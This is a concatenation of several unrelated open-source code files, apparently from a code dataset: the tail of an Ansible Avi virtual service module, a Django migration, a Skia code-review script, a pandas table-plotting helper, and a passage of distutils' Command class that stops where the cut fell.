discovered_subnet:
description:
- (internal-use) discovered subnets providing reachability for client facing virtual service ip.
- This field is deprecated.
- Field deprecated in 17.1.1.
dns_info:
description:
- Service discovery specific data including fully qualified domain name, type and time-to-live of the dns record.
- Note that only one of fqdn and dns_info setting is allowed.
dns_policies:
description:
- Dns policies applied on the dns traffic of the virtual service.
- Field introduced in 17.1.1.
version_added: "2.4"
east_west_placement:
description:
- Force placement on all se's in service group (mesos mode only).
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
enable_autogw:
description:
- Response traffic to clients will be sent back to the source mac address of the connection, rather than statically sent to a default gateway.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
enable_rhi:
description:
- Enable route health injection using the bgp config in the vrf context.
type: bool
enable_rhi_snat:
description:
- Enable route health injection for source nat'ted floating ip address using the bgp config in the vrf context.
type: bool
enabled:
description:
- Enable or disable the virtual service.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
type: bool
error_page_profile_ref:
description:
- Error page profile to be used for this virtualservice. This profile is used to send the custom error page to the client generated by the proxy.
- It is a reference to an object of type errorpageprofile.
- Field introduced in 17.2.4.
version_added: "2.5"
floating_ip:
description:
- Floating ip to associate with this virtual service.
- Field deprecated in 17.1.1.
floating_subnet_uuid:
description:
- If auto_allocate_floating_ip is true and more than one floating-ip subnets exist, then the subnet for the floating ip address allocation.
- This field is applicable only if the virtualservice belongs to an openstack or aws cloud.
- In openstack or aws cloud it is required when auto_allocate_floating_ip is selected.
- Field deprecated in 17.1.1.
flow_dist:
description:
- Criteria for flow distribution among ses.
- Enum options - LOAD_AWARE, CONSISTENT_HASH_SOURCE_IP_ADDRESS, CONSISTENT_HASH_SOURCE_IP_ADDRESS_AND_PORT.
- Default value when not specified in API or module is interpreted by Avi Controller as LOAD_AWARE.
flow_label_type:
description:
- Criteria for flow labelling.
- Enum options - NO_LABEL, APPLICATION_LABEL, SERVICE_LABEL.
- Default value when not specified in API or module is interpreted by Avi Controller as NO_LABEL.
fqdn:
description:
- Dns resolvable, fully qualified domain name of the virtualservice.
- Only one of 'fqdn' and 'dns_info' configuration is allowed.
host_name_xlate:
description:
- Translate the host name sent to the servers to this value.
- Translate the host name sent from servers back to the value used by the client.
http_policies:
description:
- Http policies applied on the data traffic of the virtual service.
ign_pool_net_reach:
description:
- Ignore pool servers network reachability constraints for virtual service placement.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
ip_address:
description:
- Ip address of the virtual service.
- Field deprecated in 17.1.1.
ipam_network_subnet:
description:
- Subnet and/or network for allocating virtualservice ip by ipam provider module.
- Field deprecated in 17.1.1.
l4_policies:
description:
- L4 policies applied to the data traffic of the virtual service.
- Field introduced in 17.2.7.
version_added: "2.6"
limit_doser:
description:
- Limit potential dos attackers who exceed max_cps_per_client significantly to a fraction of max_cps_per_client for a while.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
max_cps_per_client:
description:
- Maximum connections per second per client ip.
- Allowed values are 10-1000.
- Special values are 0- 'unlimited'.
- Default value when not specified in API or module is interpreted by Avi Controller as 0.
microservice_ref:
description:
- Microservice representing the virtual service.
- It is a reference to an object of type microservice.
name:
description:
- Name for the virtual service.
required: true
network_profile_ref:
description:
- Determines network settings such as protocol, tcp or udp, and related options for the protocol.
- It is a reference to an object of type networkprofile.
network_ref:
description:
- Manually override the network on which the virtual service is placed.
- It is a reference to an object of type network.
- Field deprecated in 17.1.1.
network_security_policy_ref:
description:
- Network security policies for the virtual service.
- It is a reference to an object of type networksecuritypolicy.
nsx_securitygroup:
description:
- A list of nsx service groups representing the clients which can access the virtual ip of the virtual service.
- Field introduced in 17.1.1.
version_added: "2.4"
performance_limits:
description:
- Optional settings that determine performance limits like max connections or bandwidth etc.
pool_group_ref:
description:
- The pool group is an object that contains pools.
- It is a reference to an object of type poolgroup.
pool_ref:
description:
- The pool is an object that contains destination servers and related attributes such as load-balancing and persistence.
- It is a reference to an object of type pool.
port_uuid:
description:
- (internal-use) network port assigned to the virtual service ip address.
- Field deprecated in 17.1.1.
remove_listening_port_on_vs_down:
description:
- Remove listening port if virtualservice is down.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
requests_rate_limit:
description:
- Rate limit the incoming requests to this virtual service.
scaleout_ecmp:
description:
- Disable re-distribution of flows across service engines for a virtual service.
- Enable if the network itself performs flow hashing with ecmp in environments such as gcp.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
se_group_ref:
description:
- The service engine group to use for this virtual service.
- Moving to a new se group is disruptive to existing connections for this vs.
- It is a reference to an object of type serviceenginegroup.
server_network_profile_ref:
description:
- Determines the network settings profile for the server side of tcp proxied connections.
- Leave blank to use the same settings as the client to vs side of the connection.
- It is a reference to an object of type networkprofile.
service_metadata:
description:
- Metadata pertaining to the service provided by this virtual service.
- In openshift/kubernetes environments, egress pod info is stored.
- Any user input to this field will be overwritten by avi vantage.
version_added: "2.4"
service_pool_select:
description:
- Select pool based on destination port.
services:
description:
- List of services defined for this virtual service.
sideband_profile:
description:
- Sideband configuration to be used for this virtualservice. It can be used for sending traffic to sideband vips for external inspection etc.
version_added: "2.4"
snat_ip:
description:
- Nat'ted floating source ip address(es) for upstream connection to servers.
sp_pool_refs:
description:
- Gslb pools used to manage site-persistence functionality.
- Each site-persistence pool contains the virtualservices in all the other sites, that is auto-generated by the gslb manager.
- This is a read-only field for the user.
- It is a reference to an object of type pool.
- Field introduced in 17.2.2.
version_added: "2.5"
ssl_key_and_certificate_refs:
description:
- Select or create one or two certificates, ec and/or rsa, that will be presented to ssl/tls terminated connections.
- It is a reference to an object of type sslkeyandcertificate.
ssl_profile_ref:
description:
- Determines the set of ssl versions and ciphers to accept for ssl/tls terminated connections.
- It is a reference to an object of type sslprofile.
ssl_sess_cache_avg_size:
description:
- Expected number of ssl session cache entries (may be exceeded).
- Allowed values are 1024-16383.
- Default value when not specified in API or module is interpreted by Avi Controller as 1024.
static_dns_records:
description:
- List of static dns records applied to this virtual service.
- These are static entries and no health monitoring is performed against the ip addresses.
subnet:
description:
- Subnet providing reachability for client facing virtual service ip.
- Field deprecated in 17.1.1.
subnet_uuid:
description:
- It represents subnet for the virtual service ip address allocation when auto_allocate_ip is true. It is only applicable in openstack or aws cloud.
- This field is required if auto_allocate_ip is true.
- Field deprecated in 17.1.1.
tenant_ref:
description:
- It is a reference to an object of type tenant.
traffic_clone_profile_ref:
description:
- Server network or list of servers for cloning traffic.
- It is a reference to an object of type trafficcloneprofile.
- Field introduced in 17.1.1.
version_added: "2.4"
traffic_enabled:
description:
- Knob to enable the virtual service traffic on its assigned service engines.
- This setting is effective only when the enabled flag is set to true.
- Field introduced in 17.2.8.
- Default value when not specified in API or module is interpreted by Avi Controller as True.
version_added: "2.6"
type: bool
type:
description:
- Specify if this is a normal virtual service, or if it is the parent or child of an sni-enabled virtual hosted virtual service.
- Enum options - VS_TYPE_NORMAL, VS_TYPE_VH_PARENT, VS_TYPE_VH_CHILD.
- Default value when not specified in API or module is interpreted by Avi Controller as VS_TYPE_NORMAL.
url:
description:
- Avi controller URL of the object.
use_bridge_ip_as_vip:
description:
- Use bridge ip as vip on each host in mesos deployments.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
type: bool
use_vip_as_snat:
description:
- Use the virtual ip as the snat ip for health monitoring and sending traffic to the backend servers instead of the service engine interface ip.
- The caveat of enabling this option is that the virtualservice cannot be configured in an active-active ha mode.
- Dns based multi vip solution has to be used for ha & non-disruptive upgrade purposes.
- Field introduced in 17.1.9,17.2.3.
- Default value when not specified in API or module is interpreted by Avi Controller as False.
version_added: "2.5"
type: bool
uuid:
description:
- Uuid of the virtualservice.
vh_domain_name:
description:
- The exact name requested from the client's sni-enabled tls hello domain name field.
- If this is a match, the parent vs will forward the connection to this child vs.
vh_parent_vs_uuid:
description:
- Specifies the virtual service acting as virtual hosting (sni) parent.
vip:
description:
- List of virtual service ips.
- While creating a 'shared vs', please use vsvip_ref to point to the shared entities.
- Field introduced in 17.1.1.
version_added: "2.4"
vrf_context_ref:
description:
- Virtual routing context that the virtual service is bound to.
- This is used to provide the isolation of the set of networks the application is attached to.
- It is a reference to an object of type vrfcontext.
vs_datascripts:
description:
- Datascripts applied on the data traffic of the virtual service.
vsvip_ref:
description:
- Mostly used during the creation of shared vs, this field refers to entities that can be shared across virtual services.
- It is a reference to an object of type vsvip.
- Field introduced in 17.1.1.
version_added: "2.4"
waf_policy_ref:
description:
- Waf policy for the virtual service.
- It is a reference to an object of type wafpolicy.
- Field introduced in 17.2.1.
version_added: "2.5"
weight:
description:
- The quality of service weight to assign to traffic transmitted from this virtual service.
- A higher weight will prioritize traffic versus other virtual services sharing the same service engines.
- Allowed values are 1-128.
- Default value when not specified in API or module is interpreted by Avi Controller as 1.
extends_documentation_fragment:
- avi
'''
EXAMPLES = """
- name: Create SSL Virtual Service using Pool testpool2
avi_virtualservice:
controller: 10.10.27.90
username: admin
password: AviNetworks123!
name: newtestvs
state: present
performance_limits:
max_concurrent_connections: 1000
services:
- port: 443
enable_ssl: true
- port: 80
ssl_profile_ref: '/api/sslprofile?name=System-Standard'
application_profile_ref: '/api/applicationprofile?name=System-Secure-HTTP'
ssl_key_and_certificate_refs:
- '/api/sslkeyandcertificate?name=System-Default-Cert'
ip_address:
addr: 10.90.131.103
type: V4
pool_ref: '/api/pool?name=testpool2'
"""
RETURN = '''
obj:
description: VirtualService (api/virtualservice) object
returned: success, changed
type: dict
'''
from ansible.module_utils.basic import AnsibleModule
try:
from ansible.module_utils.network.avi.avi import (
avi_common_argument_spec, HAS_AVI, avi_ansible_api)
except ImportError:
HAS_AVI = False
def main():
argument_specs = dict(
state=dict(default='present',
choices=['absent', 'present']),
avi_api_update_method=dict(default='put',
choices=['put', 'patch']),
avi_api_patch_op=dict(choices=['add', 'replace', 'delete']),
active_standby_se_tag=dict(type='str',),
analytics_policy=dict(type='dict',),
analytics_profile_ref=dict(type='str',),
application_profile_ref=dict(type='str',),
auto_allocate_floating_ip=dict(type='bool',),
auto_allocate_ip=dict(type='bool',),
availability_zone=dict(type='str',),
avi_allocated_fip=dict(type='bool',),
avi_allocated_vip=dict(type='bool',),
bulk_sync_kvcache=dict(type='bool',),
client_auth=dict(type='dict',),
close_client_conn_on_config_update=dict(type='bool',),
cloud_config_cksum=dict(type='str',),
cloud_ref=dict(type='str',),
cloud_type=dict(type='str',),
connections_rate_limit=dict(type='dict',),
content_rewrite=dict(type='dict',),
created_by=dict(type='str',),
delay_fairness=dict(type='bool',),
description=dict(type='str',),
discovered_network_ref=dict(type='list',),
discovered_networks=dict(type='list',),
discovered_subnet=dict(type='list',),
dns_info=dict(type='list',),
dns_policies=dict(type='list',),
east_west_placement=dict(type='bool',),
enable_autogw=dict(type='bool',),
enable_rhi=dict(type='bool',),
enable_rhi_snat=dict(type='bool',),
enabled=dict(type='bool',),
error_page_profile_ref=dict(type='str',),
floating_ip=dict(type='dict',),
floating_subnet_uuid=dict(type='str',),
flow_dist=dict(type='str',),
flow_label_type=dict(type='str',),
fqdn=dict(type='str',),
host_name_xlate=dict(type='str',),
http_policies=dict(type='list',),
ign_pool_net_reach=dict(type='bool',),
ip_address=dict(type='dict',),
ipam_network_subnet=dict(type='dict',),
l4_policies=dict(type='list',),
limit_doser=dict(type='bool',),
max_cps_per_client=dict(type='int',),
microservice_ref=dict(type='str',),
name=dict(type='str', required=True),
network_profile_ref=dict(type='str',),
network_ref=dict(type='str',),
network_security_policy_ref=dict(type='str',),
nsx_securitygroup=dict(type='list',),
performance_limits=dict(type='dict',),
pool_group_ref=dict(type='str',),
pool_ref=dict(type='str',),
port_uuid=dict(type='str',),
remove_listening_port_on_vs_down=dict(type='bool',),
requests_rate_limit=dict(type='dict',),
scaleout_ecmp=dict(type='bool',),
se_group_ref=dict(type='str',),
server_network_profile_ref=dict(type='str',),
service_metadata=dict(type='str',),
service_pool_select=dict(type='list',),
services=dict(type='list',),
sideband_profile=dict(type='dict',),
snat_ip=dict(type='list',),
sp_pool_refs=dict(type='list',),
ssl_key_and_certificate_refs=dict(type='list',),
ssl_profile_ref=dict(type='str',),
ssl_sess_cache_avg_size=dict(type='int',),
static_dns_records=dict(type='list',),
subnet=dict(type='dict',),
subnet_uuid=dict(type='str',),
tenant_ref=dict(type='str',),
traffic_clone_profile_ref=dict(type='str',),
traffic_enabled=dict(type='bool',),
type=dict(type='str',),
url=dict(type='str',),
use_bridge_ip_as_vip=dict(type='bool',),
use_vip_as_snat=dict(type='bool',),
uuid=dict(type='str',),
vh_domain_name=dict(type='list',),
vh_parent_vs_uuid=dict(type='str',),
vip=dict(type='list',),
vrf_context_ref=dict(type='str',),
vs_datascripts=dict(type='list',),
vsvip_ref=dict(type='str',),
waf_policy_ref=dict(type='str',),
weight=dict(type='int',),
)
argument_specs.update(avi_common_argument_spec())
module = AnsibleModule(
argument_spec=argument_specs, supports_check_mode=True)
if not HAS_AVI:
return module.fail_json(msg=(
'Avi python API SDK (avisdk>=17.1) is not installed. '
'For more details visit https://github.com/avinetworks/sdk.'))
return avi_ansible_api(module, 'virtualservice',
set([]))
if __name__ == '__main__':
main()
|
Bharath-J/Mezzanine
|
refs/heads/master
|
mezzanine/galleries/migrations/0002_auto_20141227_0224.py
|
46
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import mezzanine.core.fields
class Migration(migrations.Migration):
dependencies = [
('galleries', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='galleryimage',
name='_order',
field=mezzanine.core.fields.OrderField(null=True, verbose_name='Order'),
preserve_default=True,
),
]
|
MinimalOS/external_skia
|
refs/heads/lp-mr1
|
tools/add_codereview_message.py
|
68
|
#!/usr/bin/python2
# Copyright 2014 Google Inc.
#
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Add message to codereview issue.
This script takes a codereview URL or a codereview issue number as its
argument and a (possibly multi-line) message on stdin. It then calls
`git cl upload` to append the message to the given codereview issue.
Usage:
echo MESSAGE | %prog -c CHECKOUT_PATH CODEREVIEW_ISSUE
or:
cd /path/to/git/checkout
%prog CODEREVIEW_ISSUE <<EOF
MESSAGE
EOF
or:
%prog --help
"""
import optparse
import os
import sys
import git_utils
import misc_utils
DEFAULT_REVIEWERS = ','.join([
'[email protected]',
'[email protected]',
'[email protected]',
'[email protected]',
])
DEFAULT_CC_LIST = ','.join([
'[email protected]',
])
def add_codereview_message(codereview_url, message, checkout_path,
skip_cl_upload, verbose, reviewers, cclist):
"""Add a message to a given codereview.
Args:
codereview_url: (string) we will extract the issue number from
this url, or this could simply be the issue number.
message: (string) will be passed to `git cl upload -m $MESSAGE`
checkout_path: (string) location of the git
repository checkout to be used.
skip_cl_upload: (boolean) if true, don't actually
add the message and keep the temporary branch around.
verbose: (boolean) print out details useful for debugging.
reviewers: (string) comma-separated list of reviewers
cclist: (string) comma-separated list of addresses to be
carbon-copied
"""
# pylint: disable=I0011,R0913
git = git_utils.git_executable()
issue = codereview_url.strip('/').split('/')[-1]
vsp = misc_utils.VerboseSubprocess(verbose)
if skip_cl_upload:
branch_name = 'issue_%s' % issue
else:
branch_name = None
upstream = 'origin/master'
with misc_utils.ChangeDir(checkout_path, verbose):
vsp.check_call([git, 'fetch', '-q', 'origin'])
with git_utils.ChangeGitBranch(branch_name, upstream, verbose):
vsp.check_call([git, 'cl', 'patch', issue])
git_upload = [
git, 'cl', 'upload', '-t', 'bot report', '-m', message]
if cclist:
git_upload.append('--cc=' + cclist)
if reviewers:
git_upload.append('--reviewers=' + reviewers)
if skip_cl_upload:
branch_name = git_utils.git_branch_name(verbose)
space = ' '
print 'You should call:'
misc_utils.print_subprocess_args(space, ['cd', os.getcwd()])
misc_utils.print_subprocess_args(
space, [git, 'checkout', branch_name])
misc_utils.print_subprocess_args(space, git_upload)
else:
vsp.check_call(git_upload)
print vsp.check_output([git, 'cl', 'issue'])
def main(argv):
"""main function; see module-level docstring and GetOptionParser help.
Args:
argv: sys.argv[1:]-type argument list.
"""
option_parser = optparse.OptionParser(usage=__doc__)
option_parser.add_option(
'-c', '--checkout_path',
default=os.curdir,
help='Path to the Git repository checkout,'
' defaults to current working directory.')
option_parser.add_option(
'', '--skip_cl_upload', action='store_true', default=False,
help='Skip the cl upload step; useful for testing.')
option_parser.add_option(
'', '--verbose', action='store_true', dest='verbose', default=False,
help='Do not suppress the output from `git cl`.',)
option_parser.add_option(
'', '--git_path', default='git',
help='Git executable, defaults to "git".',)
option_parser.add_option(
'', '--reviewers', default=DEFAULT_REVIEWERS,
help=('Comma-separated list of reviewers. Default is "%s".'
% DEFAULT_REVIEWERS))
option_parser.add_option(
'', '--cc', default=DEFAULT_CC_LIST,
help=('Comma-separated list of addresses to be carbon-copied.'
' Default is "%s".' % DEFAULT_CC_LIST))
options, arguments = option_parser.parse_args(argv)
if not options.checkout_path:
option_parser.error('Must specify checkout_path.')
if not git_utils.git_executable():
option_parser.error('Invalid git executable.')
if len(arguments) > 1:
option_parser.error('Extra arguments.')
if len(arguments) != 1:
option_parser.error('Missing Codereview URL.')
message = sys.stdin.read()
add_codereview_message(arguments[0], message, options.checkout_path,
options.skip_cl_upload, options.verbose,
options.reviewers, options.cc)
if __name__ == '__main__':
main(sys.argv[1:])
|
kenshay/ImageScripter
|
refs/heads/master
|
ProgramData/SystemFiles/Python/Lib/site-packages/pandas/util/doctools.py
|
9
|
import numpy as np
import pandas as pd
import pandas.compat as compat
class TablePlotter(object):
"""
Layout some DataFrames in vertical/horizontal layout for explanation.
Used in merging.rst
"""
def __init__(self, cell_width=0.37, cell_height=0.25, font_size=7.5):
self.cell_width = cell_width
self.cell_height = cell_height
self.font_size = font_size
def _shape(self, df):
"""Calcurate table chape considering index levels"""
row, col = df.shape
return row + df.columns.nlevels, col + df.index.nlevels
def _get_cells(self, left, right, vertical):
"""Calcurate appropriate figure size based on left and right data"""
if vertical:
# calculate required number of cells
vcells = max(sum([self._shape(l)[0] for l in left]),
self._shape(right)[0])
hcells = (max([self._shape(l)[1] for l in left]) +
self._shape(right)[1])
else:
vcells = max([self._shape(l)[0] for l in left] +
[self._shape(right)[0]])
hcells = sum([self._shape(l)[1] for l in left] +
[self._shape(right)[1]])
return hcells, vcells
def plot(self, left, right, labels=None, vertical=True):
"""
Plot left / right DataFrames in specified layout.
Parameters
----------
left : list of DataFrames before operation is applied
right : DataFrame of operation result
labels : list of str to be drawn as titles of left DataFrames
vertical : bool
If True, use vertical layout. If False, use horizontal layout.
"""
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
if not isinstance(left, list):
left = [left]
left = [self._conv(l) for l in left]
right = self._conv(right)
hcells, vcells = self._get_cells(left, right, vertical)
if vertical:
figsize = self.cell_width * hcells, self.cell_height * vcells
else:
# include margin for titles
figsize = self.cell_width * hcells, self.cell_height * vcells
fig = plt.figure(figsize=figsize)
if vertical:
gs = gridspec.GridSpec(len(left), hcells)
# left
max_left_cols = max([self._shape(l)[1] for l in left])
max_left_rows = max([self._shape(l)[0] for l in left])
for i, (l, label) in enumerate(zip(left, labels)):
ax = fig.add_subplot(gs[i, 0:max_left_cols])
self._make_table(ax, l, title=label,
height=1.0 / max_left_rows)
# right
ax = plt.subplot(gs[:, max_left_cols:])
self._make_table(ax, right, title='Result', height=1.05 / vcells)
fig.subplots_adjust(top=0.9, bottom=0.05, left=0.05, right=0.95)
else:
max_rows = max([self._shape(df)[0] for df in left + [right]])
height = 1.0 / np.max(max_rows)
gs = gridspec.GridSpec(1, hcells)
# left
i = 0
for l, label in zip(left, labels):
sp = self._shape(l)
ax = fig.add_subplot(gs[0, i:i + sp[1]])
self._make_table(ax, l, title=label, height=height)
i += sp[1]
# right
ax = plt.subplot(gs[0, i:])
self._make_table(ax, right, title='Result', height=height)
fig.subplots_adjust(top=0.85, bottom=0.05, left=0.05, right=0.95)
return fig
def _conv(self, data):
"""Convert each input to appropriate for table outplot"""
if isinstance(data, pd.Series):
if data.name is None:
data = data.to_frame(name='')
else:
data = data.to_frame()
data = data.fillna('NaN')
return data
def _insert_index(self, data):
# insert is destructive
data = data.copy()
idx_nlevels = data.index.nlevels
if idx_nlevels == 1:
data.insert(0, 'Index', data.index)
else:
for i in range(idx_nlevels):
data.insert(i, 'Index{0}'.format(i),
data.index.get_level_values(i))
col_nlevels = data.columns.nlevels
if col_nlevels > 1:
col = data.columns.get_level_values(0)
values = [data.columns.get_level_values(i).values
for i in range(1, col_nlevels)]
col_df = pd.DataFrame(values)
data.columns = col_df.columns
data = pd.concat([col_df, data])
data.columns = col
return data
def _make_table(self, ax, df, title, height=None):
if df is None:
ax.set_visible(False)
return
import pandas.tools.plotting as plotting
idx_nlevels = df.index.nlevels
col_nlevels = df.columns.nlevels
# must be converted here to get index levels for colorization
df = self._insert_index(df)
tb = plotting.table(ax, df, loc=9)
tb.set_fontsize(self.font_size)
if height is None:
height = 1.0 / (len(df) + 1)
props = tb.properties()
for (r, c), cell in compat.iteritems(props['celld']):
if c == -1:
cell.set_visible(False)
elif r < col_nlevels and c < idx_nlevels:
cell.set_visible(False)
elif r < col_nlevels or c < idx_nlevels:
cell.set_facecolor('#AAAAAA')
cell.set_height(height)
ax.set_title(title, size=self.font_size)
ax.axis('off')
if __name__ == "__main__":
import matplotlib.pyplot as plt
p = TablePlotter()
df1 = pd.DataFrame({'A': [10, 11, 12],
'B': [20, 21, 22],
'C': [30, 31, 32]})
df2 = pd.DataFrame({'A': [10, 12],
'C': [30, 32]})
p.plot([df1, df2], pd.concat([df1, df2]),
labels=['df1', 'df2'], vertical=True)
plt.show()
df3 = pd.DataFrame({'X': [10, 12],
'Z': [30, 32]})
p.plot([df1, df3], pd.concat([df1, df3], axis=1),
labels=['df1', 'df2'], vertical=False)
plt.show()
idx = pd.MultiIndex.from_tuples([(1, 'A'), (1, 'B'), (1, 'C'),
(2, 'A'), (2, 'B'), (2, 'C')])
col = pd.MultiIndex.from_tuples([(1, 'A'), (1, 'B')])
df3 = pd.DataFrame({'v1': [1, 2, 3, 4, 5, 6],
'v2': [5, 6, 7, 8, 9, 10]},
index=idx)
df3.columns = col
p.plot(df3, df3, labels=['df3'])
plt.show()
|
blacklin/kbengine
|
refs/heads/master
|
kbe/res/scripts/common/Lib/distutils/cmd.py
|
97
|
"""distutils.cmd
Provides the Command class, the base class for the command classes
in the distutils.command package.
"""
import sys, os, re
from distutils.errors import DistutilsOptionError
from distutils import util, dir_util, file_util, archive_util, dep_util
from distutils import log
class Command:
"""Abstract base class for defining command classes, the "worker bees"
of the Distutils. A useful analogy for command classes is to think of
them as subroutines with local variables called "options". The options
are "declared" in 'initialize_options()' and "defined" (given their
final values, aka "finalized") in 'finalize_options()', both of which
must be defined by every command class. The distinction between the
two is necessary because option values might come from the outside
world (command line, config file, ...), and any options dependent on
other options must be computed *after* these outside influences have
been processed -- hence 'finalize_options()'. The "body" of the
subroutine, where it does all its work based on the values of its
options, is the 'run()' method, which must also be implemented by every
command class.
"""
# 'sub_commands' formalizes the notion of a "family" of commands,
# eg. "install" as the parent with sub-commands "install_lib",
# "install_headers", etc. The parent of a family of commands
# defines 'sub_commands' as a class attribute; it's a list of
# (command_name : string, predicate : unbound_method | string | None)
# tuples, where 'predicate' is a method of the parent command that
# determines whether the corresponding command is applicable in the
# current situation. (Eg. "install_headers" is only applicable if
# we have any C header files to install.) If 'predicate' is None,
# that command is always applicable.
#
# 'sub_commands' is usually defined at the *end* of a class, because
# predicates can be unbound methods, so they must already have been
# defined. The canonical example is the "install" command.
sub_commands = []
# -- Creation/initialization methods -------------------------------
def __init__(self, dist):
"""Create and initialize a new Command object. Most importantly,
invokes the 'initialize_options()' method, which is the real
initializer and depends on the actual command being
instantiated.
"""
# late import because of mutual dependence between these classes
from distutils.dist import Distribution
if not isinstance(dist, Distribution):
raise TypeError("dist must be a Distribution instance")
if self.__class__ is Command:
raise RuntimeError("Command is an abstract class")
self.distribution = dist
self.initialize_options()
# Per-command versions of the global flags, so that the user can
# customize Distutils' behaviour command-by-command and let some
# commands fall back on the Distribution's behaviour. None means
# "not defined, check self.distribution's copy", while 0 or 1 mean
# false and true (duh). Note that this means figuring out the real
# value of each flag is a touch complicated -- hence "self._dry_run"
# will be handled by __getattr__, below.
# XXX This needs to be fixed.
self._dry_run = None
# verbose is largely ignored, but needs to be set for
# backwards compatibility (I think)?
self.verbose = dist.verbose
# Some commands define a 'self.force' option to ignore file
# timestamps, but methods defined *here* assume that
# 'self.force' exists for all commands. So define it here
# just to be safe.
self.force = None
# The 'help' flag is just used for command-line parsing, so
# none of that complicated bureaucracy is needed.
self.help = 0
# 'finalized' records whether or not 'finalize_options()' has been
# called. 'finalize_options()' itself should not pay attention to
# this flag: it is the business of 'ensure_finalized()', which
# always calls 'finalize_options()', to respect/update it.
self.finalized = 0
# XXX A more explicit way to customize dry_run would be better.
def __getattr__(self, attr):
if attr == 'dry_run':
myval = getattr(self, "_" + attr)
if myval is None:
return getattr(self.distribution, attr)
else:
return myval
else:
raise AttributeError(attr)
def ensure_finalized(self):
if not self.finalized:
self.finalize_options()
self.finalized = 1
# Subclasses must define:
# initialize_options()
# provide default values for all options; may be customized by
# setup script, by options from config file(s), or by command-line
# options
# finalize_options()
# decide on the final values for all options; this is called
# after all possible intervention from the outside world
# (command-line, option file, etc.) has been processed
# run()
# run the command: do whatever it is we're here to do,
# controlled by the command's various option values
def initialize_options(self):
"""Set default values for all the options that this command
supports. Note that these defaults may be overridden by other
commands, by the setup script, by config files, or by the
command-line. Thus, this is not the place to code dependencies
between options; generally, 'initialize_options()' implementations
are just a bunch of "self.foo = None" assignments.
This method must be implemented by all command classes.
"""
raise RuntimeError("abstract method -- subclass %s must override"
% self.__class__)
def finalize_options(self):
"""Set final values for all the options that this command supports.
This is always called as late as possible, ie. after any option
assignments from the command-line or from other commands have been
done. Thus, this is the place to code option dependencies: if
'foo' depends on 'bar', then it is safe to set 'foo' from 'bar' as
long as 'foo' still has the same value it was assigned in
'initialize_options()'.
This method must be implemented by all command classes.
"""
raise RuntimeError("abstract method -- subclass %s must override"
% self.__class__)
def dump_options(self, header=None, indent=""):
from distutils.fancy_getopt import longopt_xlate
if header is None:
header = "command options for '%s':" % self.get_command_name()
self.announce(indent + header, level=log.INFO)
indent = indent + " "
for (option, _, _) in self.user_options:
option = option.translate(longopt_xlate)
if option[-1] == "=":
option = option[:-1]
value = getattr(self, option)
self.announce(indent + "%s = %s" % (option, value),
level=log.INFO)
def run(self):
"""A command's raison d'etre: carry out the action it exists to
perform, controlled by the options initialized in
'initialize_options()', customized by other commands, the setup
script, the command-line, and config files, and finalized in
'finalize_options()'. All terminal output and filesystem
interaction should be done by 'run()'.
This method must be implemented by all command classes.
"""
raise RuntimeError("abstract method -- subclass %s must override"
% self.__class__)
def announce(self, msg, level=1):
"""If the current verbosity level is of greater than or equal to
'level' print 'msg' to stdout.
"""
log.log(level, msg)
def debug_print(self, msg):
"""Print 'msg' to stdout if the global DEBUG (taken from the
DISTUTILS_DEBUG environment variable) flag is true.
"""
from distutils.debug import DEBUG
if DEBUG:
print(msg)
sys.stdout.flush()
# -- Option validation methods -------------------------------------
# (these are very handy in writing the 'finalize_options()' method)
#
# NB. the general philosophy here is to ensure that a particular option
# value meets certain type and value constraints. If not, we try to
# force it into conformance (eg. if we expect a list but have a string,
# split the string on comma and/or whitespace). If we can't force the
# option into conformance, raise DistutilsOptionError. Thus, command
# classes need do nothing more than (eg.)
# self.ensure_string_list('foo')
# and they can be guaranteed that thereafter, self.foo will be
# a list of strings.
def _ensure_stringlike(self, option, what, default=None):
val = getattr(self, option)
if val is None:
setattr(self, option, default)
return default
elif not isinstance(val, str):
raise DistutilsOptionError("'%s' must be a %s (got `%s`)"
% (option, what, val))
return val
def ensure_string(self, option, default=None):
"""Ensure that 'option' is a string; if not defined, set it to
'default'.
"""
self._ensure_stringlike(option, "string", default)
def ensure_string_list(self, option):
"""Ensure that 'option' is a list of strings. If 'option' is
currently a string, we split it either on /,\s*/ or /\s+/, so
"foo bar baz", "foo,bar,baz", and "foo, bar baz" all become
["foo", "bar", "baz"].
"""
val = getattr(self, option)
if val is None:
return
elif isinstance(val, str):
setattr(self, option, re.split(r',\s*|\s+', val))
else:
if isinstance(val, list):
ok = all(isinstance(v, str) for v in val)
else:
ok = False
if not ok:
raise DistutilsOptionError(
"'%s' must be a list of strings (got %r)"
% (option, val))
def _ensure_tested_string(self, option, tester, what, error_fmt,
default=None):
val = self._ensure_stringlike(option, what, default)
if val is not None and not tester(val):
raise DistutilsOptionError(("error in '%s' option: " + error_fmt)
% (option, val))
def ensure_filename(self, option):
"""Ensure that 'option' is the name of an existing file."""
self._ensure_tested_string(option, os.path.isfile,
"filename",
"'%s' does not exist or is not a file")
def ensure_dirname(self, option):
self._ensure_tested_string(option, os.path.isdir,
"directory name",
"'%s' does not exist or is not a directory")
# -- Convenience methods for commands ------------------------------
def get_command_name(self):
if hasattr(self, 'command_name'):
return self.command_name
else:
return self.__class__.__name__
def set_undefined_options(self, src_cmd, *option_pairs):
"""Set the values of any "undefined" options from corresponding
option values in some other command object. "Undefined" here means
"is None", which is the convention used to indicate that an option
has not been changed between 'initialize_options()' and
'finalize_options()'. Usually called from 'finalize_options()' for
options that depend on some other command rather than another
option of the same command. 'src_cmd' is the other command from
which option values will be taken (a command object will be created
for it if necessary); the remaining arguments are
'(src_option,dst_option)' tuples which mean "take the value of
'src_option' in the 'src_cmd' command object, and copy it to
'dst_option' in the current command object".
"""
# Option_pairs: list of (src_option, dst_option) tuples
src_cmd_obj = self.distribution.get_command_obj(src_cmd)
src_cmd_obj.ensure_finalized()
for (src_option, dst_option) in option_pairs:
if getattr(self, dst_option) is None:
